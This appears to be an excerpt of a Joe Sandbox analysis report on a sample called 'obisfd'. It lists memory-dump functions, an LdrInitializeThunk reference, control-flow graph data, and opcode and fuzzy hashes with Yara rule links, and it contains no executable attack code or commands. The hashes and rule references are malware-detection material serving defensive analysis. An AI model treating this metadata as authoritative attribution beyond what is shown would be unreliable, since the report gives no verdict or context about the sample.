                                                                                            control_flow_graph 1337 30e133 1338 30e1f2-30e203 1337->1338 1339 30e205 1338->1339 1340 30e20a-30e213 1338->1340 1339->1340 1342 30e219-30e22c 1340->1342 1343 30dfeb-30e010 1340->1343 1346 30e233-30e24e 1342->1346 1347 30e22e 1342->1347 1344 30e012 1343->1344 1345 30e017-30e04d 1343->1345 1344->1345 1356 30e054-30e086 1345->1356 1357 30e04f 1345->1357 1348 30e250 1346->1348 1349 30e255-30e269 1346->1349 1347->1346 1348->1349 1352 30e270-30e286 LdrInitializeThunk 1349->1352 1353 30e26b 1349->1353 1355 30e288-30e384 1352->1355 1353->1352 1360 30e386-30e38b 1355->1360 1361 30e38c-30e396 1355->1361 1362 30e088-30e0ad 1356->1362 1363 30e0ea-30e0fd 1356->1363 1357->1356 1360->1361 1364 30e0b4-30e0e2 1362->1364 1365 30e0af 1362->1365 1367 30e104-30e129 1363->1367 1368 30e0ff 1363->1368 1364->1363 1365->1364 1371 30e138-30e170 1367->1371 1372 30e12b-30e12c 1367->1372 1368->1367 1373 30e172 1371->1373 1374 30e177-30e1d8 1371->1374 1372->1342 1373->1374 1379 30e1da 1374->1379 1380 30e1df-30e1f1 1374->1380 1379->1380 1380->1338
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 0030E275
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2ed8ecbbc75b134133e9e0290f91b37616b0117bfd98f5f9f3dbf82d184813e2
                                                                                            • Instruction ID: 9d15ec1bfa0621afdd9a72a168ce992412c936e19836a3b4d90904d41764a06c
                                                                                            • Opcode Fuzzy Hash: 2ed8ecbbc75b134133e9e0290f91b37616b0117bfd98f5f9f3dbf82d184813e2
                                                                                            • Instruction Fuzzy Hash: B4118174F022189FEB05DFA8C984AADB7B9FB88305F608965E804E7281D730D945DF10
                                                                                            Function 004E9320 Relevance: .2, Instructions: 171COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923489341.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c306123042894c69ed8e2bce6734b6a6f648d5b6652e07de25f1d5befbd7ce73
                                                                                            • Instruction ID: f40b5af69806b5e4054b37bac888d31be56c148403b1ca785b4bd791811e590c
                                                                                            • Opcode Fuzzy Hash: c306123042894c69ed8e2bce6734b6a6f648d5b6652e07de25f1d5befbd7ce73
                                                                                            • Instruction Fuzzy Hash: 3671D474E00218CFDB14DFA6C990B9DBBB2FF89301F24852AD415AB399DB35A942CF54
                                                                                            Function 00693E68 Relevance: .2, Instructions: 171COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923549329.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_690000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cfb135da3d8812a506030e154e35cdae9e3cfa51aa4849f44f5a7478256b2373
                                                                                            • Instruction ID: 48e695891089b80f0d374f571e536abe7f107415166532de7547d6277f298fdf
                                                                                            • Opcode Fuzzy Hash: cfb135da3d8812a506030e154e35cdae9e3cfa51aa4849f44f5a7478256b2373
                                                                                            • Instruction Fuzzy Hash: 7C71D174E002188FDB14DFA6D891BADBBB2FF89300F648529D405AB359DB356942CF50
                                                                                            Function 006E1BC0 Relevance: .1, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2fe1520052214426a4e76025172a4e929dcf85718171b44403144f6c2e47248f
                                                                                            • Instruction ID: 336f1507fb280ecb3dbecbc563c07d4830bf34837f8c957fd8571c78f8ab3a66
                                                                                            • Opcode Fuzzy Hash: 2fe1520052214426a4e76025172a4e929dcf85718171b44403144f6c2e47248f
                                                                                            • Instruction Fuzzy Hash: 5E41CF74D012488FDB14DFA9D994BEDBBB2BB99300F20812AE415AB394DB786946CF50
                                                                                            Function 006E1BD0 Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3a1d193f7df760f6f38207add175975c1f923177b566142aa8f1627d476c01f6
                                                                                            • Instruction ID: a9665e62eb212b8efd9808e44161d0febc06046407da967b0610866031cfc281
                                                                                            • Opcode Fuzzy Hash: 3a1d193f7df760f6f38207add175975c1f923177b566142aa8f1627d476c01f6
                                                                                            • Instruction Fuzzy Hash: 5041BF74D01248CFDB14DFA9D5987DDBBF2BB89300F20812AE415AB394EB786946CF50
                                                                                            Function 004E9312 Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923489341.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 538926bf8e8c877065c34f616aed874ab9de6e54e0d61a25245fe01c70ce491e
                                                                                            • Instruction ID: 9c029277f52abf93f4ca419e3647b4088f1818f4af9352e6baf1c891c41d42ae
                                                                                            • Opcode Fuzzy Hash: 538926bf8e8c877065c34f616aed874ab9de6e54e0d61a25245fe01c70ce491e
                                                                                            • Instruction Fuzzy Hash: CD310570E012488FDB08DFAAC9557DEBBF2AF89301F24C02AD418BB294DB345902CF54
                                                                                            Function 0069A112 Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923549329.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_690000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5e4914bacd38eaaaa318dfdd4c7aad825d4d9bcdf7cb562de30a8623a585656d
                                                                                            • Instruction ID: f772f8bf8baf6750a5afa6a3254767a35dfa0658963f0b8fc4c3ae2b0ec34684
                                                                                            • Opcode Fuzzy Hash: 5e4914bacd38eaaaa318dfdd4c7aad825d4d9bcdf7cb562de30a8623a585656d
                                                                                            • Instruction Fuzzy Hash: DE31E274E012088FDB48DFEAD8546EEBBF2BF89300F14D12AD419AB254EB745906CF55
                                                                                            Function 002BD044 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923375284.00000000002BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2bd000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6f703f3fae779a4dcd1a283db8ea594a4ee8884729df04cd7b71c6d3ba7855af
                                                                                            • Instruction ID: 4e3b0457b82d0e6f748a79a922330c8a58706c3eaf811f319fe6b98e884ececa
                                                                                            • Opcode Fuzzy Hash: 6f703f3fae779a4dcd1a283db8ea594a4ee8884729df04cd7b71c6d3ba7855af
                                                                                            • Instruction Fuzzy Hash: AD212975624304DFEB10DF24C8C4B96BB61FB84354F34C969E8494B242D776D866CB62
                                                                                            Function 002BD03F Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923375284.00000000002BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2bd000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                            • Instruction ID: b82c6609ce8f35d2ed78385efab72e90f328a663e11f9b2f01c858bf4226788e
                                                                                            • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                            • Instruction Fuzzy Hash: 0011DD75504280CFDB11CF14C9C4B95BFA1FB84314F24CAAAD8494B656C33AD85ACFA2

                                                                                            Non-executed Functions

                                                                                            Function 004F7C08 Relevance: .3, Instructions: 300COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5f4b7a0f18642f8e32f66ddef6b901cc842a3566cb5a214a7bfdc22bbf52f760
                                                                                            • Instruction ID: 6e8d22b05f54cb7406eb2646dede6b9d197c634f25f679b5545e50c546c6b6eb
                                                                                            • Opcode Fuzzy Hash: 5f4b7a0f18642f8e32f66ddef6b901cc842a3566cb5a214a7bfdc22bbf52f760
                                                                                            • Instruction Fuzzy Hash: EFE1D0B4E01218CFDB64DFA5C944B9DBBB2FF89300F6085AAD408AB395DB355A85CF14
                                                                                            Function 006BDE88 Relevance: .3, Instructions: 296COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 7889596ea67bf01ab80ae02100fc7489cc08111fa7a92f19e3e0e7be8857d194
                                                                                            • Instruction ID: 3f2e5cfb511d84c050f3eaf6dc3cab23a0b6611b76ff75343a619699eadc56bb
                                                                                            • Opcode Fuzzy Hash: 7889596ea67bf01ab80ae02100fc7489cc08111fa7a92f19e3e0e7be8857d194
                                                                                            • Instruction Fuzzy Hash: C7E1D3B4E01218CFEB64DFA5C854BDDBBB2BF89300F2084A9D409AB395DB355A85CF50
                                                                                            Function 004FB748 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7143dbfc65156d94913bd112394d2cb3b4f56d632c327c195e0ccb7a75364e04
                                                                                            • Instruction ID: 1d8d2c68d665a237e740ce908ea85aca2f373e354b637a70305eb207b45d5364
                                                                                            • Opcode Fuzzy Hash: 7143dbfc65156d94913bd112394d2cb3b4f56d632c327c195e0ccb7a75364e04
                                                                                            • Instruction Fuzzy Hash: 94D1B274E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB355DB359E81CF54
                                                                                            Function 004F8C40 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0e4e8205898687396ef05611e0a6c6e6db5f14794eb61f7458ecd771fbc209e
                                                                                            • Instruction ID: 1b08e0702bed8c2bdb0109ce2b0e24923344602e94e8a722a0b996a0eb240bf6
                                                                                            • Opcode Fuzzy Hash: a0e4e8205898687396ef05611e0a6c6e6db5f14794eb61f7458ecd771fbc209e
                                                                                            • Instruction Fuzzy Hash: 23D1B074E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB395DB359E81CF54
                                                                                            Function 004FE250 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37a9d63f1836afa3c0527c9f3e5d0bbfa5bd9826c18b04436d7f8dd8fc741859
                                                                                            • Instruction ID: 6599e3644fec53b36fdb28cbf5ee4ac0bf229819670cb471471a4f6453293fb2
                                                                                            • Opcode Fuzzy Hash: 37a9d63f1836afa3c0527c9f3e5d0bbfa5bd9826c18b04436d7f8dd8fc741859
                                                                                            • Instruction Fuzzy Hash: 01D1B274E002188FDB54DFA5C994BADBBB2FF89300F5081AAD409AB395DB359D81CF50
                                                                                            Function 004FCA68 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 693ff26b250334d33b4fedb5df75eee1b4e135a34147526a3bf9866cf6b79e5f
                                                                                            • Instruction ID: 180ff9cbb0795e44815184292294d1e499c91de35e825b499d14ab0322b39018
                                                                                            • Opcode Fuzzy Hash: 693ff26b250334d33b4fedb5df75eee1b4e135a34147526a3bf9866cf6b79e5f
                                                                                            • Instruction Fuzzy Hash: 6CD1B174E002188FDB54DFA5C995BADBBB2FF89300F5081AAD409AB395DB359E81CF50
                                                                                            Function 004F9F60 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8ac23e9540d88ba0758f69136c6da1683c13b3b40294ef6f3c0eb2731fc3bca2
                                                                                            • Instruction ID: d66eef5bd365b1ff19610327428b938e7f2b86f2a7d7be66d0c2f0422b821f19
                                                                                            • Opcode Fuzzy Hash: 8ac23e9540d88ba0758f69136c6da1683c13b3b40294ef6f3c0eb2731fc3bca2
                                                                                            • Instruction Fuzzy Hash: C5D1C274E002188FDB54DFA5C894BADBBB2FF89300F5081AAD409AB355DB355E81CF50
                                                                                            Function 004F8778 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1e4d0a4f0276910b019449764f3ca9bcbd84ef88508aca7d15884131f050045
                                                                                            • Instruction ID: 566e848219640d265453188e482b33896b621b0b2a63a03a16a1e488b6a77702
                                                                                            • Opcode Fuzzy Hash: f1e4d0a4f0276910b019449764f3ca9bcbd84ef88508aca7d15884131f050045
                                                                                            • Instruction Fuzzy Hash: 33D1B274E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB355DB359E81CF54
                                                                                            Function 004FF570 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 02e751ac4fb80d2786e257fc3645ddebf514755d80fde75e3fac1b05fb7e8d78
                                                                                            • Instruction ID: 50170b3a3c9571db61f280ecef3f784872058978eb3daed5f47793f5ea1e0e70
                                                                                            • Opcode Fuzzy Hash: 02e751ac4fb80d2786e257fc3645ddebf514755d80fde75e3fac1b05fb7e8d78
                                                                                            • Instruction Fuzzy Hash: 88D1C174E002188FDB54DFA5C894BADBBB2FF89300F5081AAD409AB395DB359E85CF50
                                                                                            Function 004F9108 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a185a09fcb3879eafc77857ac5548af4c568e1364402f742964a509195578c1
                                                                                            • Instruction ID: 8963c9941df452ed3e9b111fb98688f2696ee2cfad0be94624c2b1078e950c42
                                                                                            • Opcode Fuzzy Hash: 7a185a09fcb3879eafc77857ac5548af4c568e1364402f742964a509195578c1
                                                                                            • Instruction Fuzzy Hash: F3D1B174E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB395DB359E81CF54
                                                                                            Function 004FE718 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e09333244ad8872bd427f9b2ae62122f2adc346d66b5fe8fac77a8646097da1
                                                                                            • Instruction ID: ce70a1471bd79838136d0726879d9e705d0c45ccc84c39b3cc52f3dabfa7a4e3
                                                                                            • Opcode Fuzzy Hash: 0e09333244ad8872bd427f9b2ae62122f2adc346d66b5fe8fac77a8646097da1
                                                                                            • Instruction Fuzzy Hash: C0D1B374E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB395DB356E81CF54
                                                                                            Function 004FBC10 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 38bf1fe185570cc70f8e77c88c3cd2db218d3f6443cc8a144cae6781949e234c
                                                                                            • Instruction ID: 7c2c37a93c099140ad2405bd95081fc55ca3bbc7f79ff6b40c995b658b4a36c5
                                                                                            • Opcode Fuzzy Hash: 38bf1fe185570cc70f8e77c88c3cd2db218d3f6443cc8a144cae6781949e234c
                                                                                            • Instruction Fuzzy Hash: E8D1B074E002188FDB54DFA5C994BADBBB2FF89300F5081AAD409AB395DB359E81CF50
                                                                                            Function 004FA428 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8fbbbe564f545ecaa1178487adca6a5f37937ce2393606a93719b4ab9ee72e71
                                                                                            • Instruction ID: 514eef5889604bdfd30d1fdee07cd32056774f14ea603c1c1ce06563affd4716
                                                                                            • Opcode Fuzzy Hash: 8fbbbe564f545ecaa1178487adca6a5f37937ce2393606a93719b4ab9ee72e71
                                                                                            • Instruction Fuzzy Hash: BFD1B174E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB395DB359E81CF51
                                                                                            Function 004FFA38 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aa39f338509595e21aba1eabe78024d0340468f951ca8b1abdc0ba74fd2cf8b3
                                                                                            • Instruction ID: 4f84ee01273bd10557738a347ad5c62748fe2d756479ffed6bb268989550c0a6
                                                                                            • Opcode Fuzzy Hash: aa39f338509595e21aba1eabe78024d0340468f951ca8b1abdc0ba74fd2cf8b3
                                                                                            • Instruction Fuzzy Hash: 6DD1B274E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB355DB356E85CF50
                                                                                            Function 004FCF30 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f80928e6377bc684e399f621e97899316c851f3ee7a99cb6dc49b73b751f504
                                                                                            • Instruction ID: cfdfabd68f108510cad97863369360573fd756b2d80be2faab2483bf0233f43a
                                                                                            • Opcode Fuzzy Hash: 3f80928e6377bc684e399f621e97899316c851f3ee7a99cb6dc49b73b751f504
                                                                                            • Instruction Fuzzy Hash: A2D1B074E002188FDB54DFA5C995BADBBB2FF89300F5081AAD409AB395DB359E81CF50
                                                                                            Function 004FD8C0 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c275a738a717fa2ecc825fab87d7fef94542d5fbbc8ca504257fa6e66332417b
                                                                                            • Instruction ID: 89b28e40044a6a988d1f3a4e0cd07db94c2e19edc5a0b1c7d2a12f5cd2ba27ff
                                                                                            • Opcode Fuzzy Hash: c275a738a717fa2ecc825fab87d7fef94542d5fbbc8ca504257fa6e66332417b
                                                                                            • Instruction Fuzzy Hash: 9FD1B274E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB395DB359E81CF54
                                                                                            Function 004FC0D8 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95f6ee2e91f5611f3555270220fcf1c2b87fb86341ccfee1fbb28e84d7c662a9
                                                                                            • Instruction ID: 1523a1d85a075ea51169e40be10a2995997b38c0abda97204423e52f2c7f0230
                                                                                            • Opcode Fuzzy Hash: 95f6ee2e91f5611f3555270220fcf1c2b87fb86341ccfee1fbb28e84d7c662a9
                                                                                            • Instruction Fuzzy Hash: D3D1B374E002288FDB54DFA5C995BADBBB2FF89300F5081AAD409AB355DB359E81CF50
                                                                                            Function 004FEBE0 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6686d84d44866545327dbf352f8a826d5fc7735e6a19236c2ee9ad714235f52
                                                                                            • Instruction ID: 26a6c072106d72496aad0729cf4edf2ddd03873713168a20550291e2de0e4408
                                                                                            • Opcode Fuzzy Hash: d6686d84d44866545327dbf352f8a826d5fc7735e6a19236c2ee9ad714235f52
                                                                                            • Instruction Fuzzy Hash: 1FD1B174E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB395DB359E81CF54
                                                                                            Function 004FD3F8 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1030fcff7b012f85796857f6e34f8912c5e155ea9ae42b5bcfac857d81c3a92
                                                                                            • Instruction ID: 3e8b1fd95b65de09725b39ac09bd8c611a39943102f7a6b691cb7fc8b54adabb
                                                                                            • Opcode Fuzzy Hash: f1030fcff7b012f85796857f6e34f8912c5e155ea9ae42b5bcfac857d81c3a92
                                                                                            • Instruction Fuzzy Hash: 9CD1A174E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB395DB359E81CF54
                                                                                            Function 004FA8F0 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07bef47d988e644abbda4c4fe9576c635d1b238565706518038a0981227a2eb4
                                                                                            • Instruction ID: 71122e47173ad76ae0eeb8a4985bb07237e45ff605517d8b9d7dc2f6ccd5a473
                                                                                            • Opcode Fuzzy Hash: 07bef47d988e644abbda4c4fe9576c635d1b238565706518038a0981227a2eb4
                                                                                            • Instruction Fuzzy Hash: B1D1C374E002188FDB54DFA5C894BADBBB2FF89300F5081AAD409AB355DB359E81CF51
                                                                                            Function 004FDD88 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
